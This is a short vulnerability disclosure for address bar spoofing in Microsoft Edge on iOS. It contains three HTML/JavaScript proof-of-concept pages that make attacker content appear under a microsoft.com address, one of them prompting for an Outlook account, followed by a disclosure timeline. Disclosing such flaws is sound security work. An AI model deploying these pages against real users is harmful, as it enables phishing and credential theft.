Microsoft Edge on iOS UI spoofing

Description

There were a dozen address bar spoofing vulnerabilities in the Edge browser for iOS that allow an attacker to trick a user into visiting a spoofed website that appears to be legitimate.

1) Spoofing Case #1:

PoC:

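<!-- Anchor to https://www.microsoft.com:1234 with the download attribute; the script below clicks it on page load -->
<a href="https://www.microsoft.com:1234" download></a>
<script>
document.querySelector("a").click();
</script>
<!-- Visible link that opens a prompt() dialog from this page when clicked -->
<h1><a href="javascript:prompt('Input your outlook account:')">click me</a></h1>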

2) Spoofing Case #2:

PoC:

<script>
function pwn() {
// v: repeatedly opens a popup named 'test' pointing at https://www.microsoft.com:1234
v = setInterval(`x=window.open('https://www.microsoft.com:1234','test', 'width=400 height=300')`);
// i: after 3333 ms, writes content into the popup, shows a prompt from it, then stops both timers
i = setInterval(`
x.document.write("<h1>url spoofing...</h1>");
x.window.prompt('dialog from');
clearInterval(v);
clearInterval(i);
`, 3333);
}
</script>
<li onclick="pwn()">click me</li>

3) Spoofing Case #3:

PoC:

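<!-- Anchor to https://www.microsoft.com:1234 with the download attribute; the script below clicks it on page load -->
<a href="https://www.microsoft.com:1234" download></a>
<script>
document.querySelector("a").click();
</script>
<!-- File input that shows an alert() dialog from this page when clicked -->
<h1><input type="file" name="file" onclick="javascript:alert('please upload file')"></h1>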

Disclosure Timeline

2020/04/18 Provided vulnerability details to Microsoft
2020/04/27 Microsoft said these vulnerabilities don’t meet the bar for servicing by MSRC.
2020/05/20 Disclosed